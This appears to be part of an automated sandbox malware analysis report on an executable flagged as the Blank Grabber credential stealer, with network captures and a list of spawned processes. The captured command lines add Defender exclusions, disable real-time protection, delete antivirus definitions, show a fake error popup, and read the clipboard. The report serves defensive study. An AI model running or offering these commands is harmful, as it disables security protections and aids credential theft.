2024-10-31 18:20:13 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.4	51312	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:14 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:13 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182013Z-16849878b78j7llf5vkyvvcehs0000000awg00000000trqe x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:14 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
147	192.168.2.4	51311	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:14 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:14 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: 384d3f9c-b01e-003d-2424-26d32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182014Z-17c5cb586f62vrfquq10qybcuw00000002t000000000ntgq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:14 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
148	192.168.2.4	51313	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:14 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:14 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: a3f41134-c01e-00ad-7d0b-29a2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182014Z-15b8d89586fcvr6p5956n5d0rc0000000g70000000002yck x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:14 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
149	192.168.2.4	51314	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:14 UTC	192	OUT	GET /rules/rule120663v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:14 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:14 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB556A907" x-ms-request-id: a342e9ea-d01e-0066-419c-27ea17000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182014Z-16849878b78wc6ln1zsrz6q9w800000009p000000000358n x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-10-31 18:20:14 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Target ID:	0
Start time:	14:19:01
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\El9HaBFrFM.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\El9HaBFrFM.exe"
Imagebase:	0x7ff6ba3a0000
File size:	8'278'102 bytes
MD5 hash:	9500DA3F633857C71861D6AF33820C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1687939163.00000230D3DC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1687939163.00000230D3DC4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:19:01
Start date:	31/10/2024
Path:	C:\Users\user\Desktop\El9HaBFrFM.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\El9HaBFrFM.exe"
Imagebase:	0x7ff6ba3a0000
File size:	8'278'102 bytes
MD5 hash:	9500DA3F633857C71861D6AF33820C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2243032085.0000025069320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1703337610.0000025067FF5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.2241739190.000002506917B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2250100607.00000250684C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2249585620.0000025068140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.2254069352.0000025069320000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "start bound.exe"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"
Imagebase:	0x7ff625d80000
File size:	14'848 bytes
MD5 hash:	0B4340ED812DC82CE636C00FA5C9BEF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Users\user\AppData\Local\Temp\bound.exe
Wow64 process (32bit):	false
Commandline:	bound.exe
Imagebase:	0x26c525e0000
File size:	1'152'512 bytes
MD5 hash:	42B9EB8BF1D2D2AABDA3977656AF4364
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:19:04
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:19:05
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:19:05
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3192, Parent PID: 7276

General

Target ID:	22
Start time:	14:19:05
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:19:05
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:19:06
Start date:	31/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6c6920000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:19:06
Start date:	31/10/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff6c6920000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff7356c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7568, Parent PID: 3468

General

Target ID:	30
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff6e2040000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:19:07
Start date:	31/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:19:08
Start date:	31/10/2024
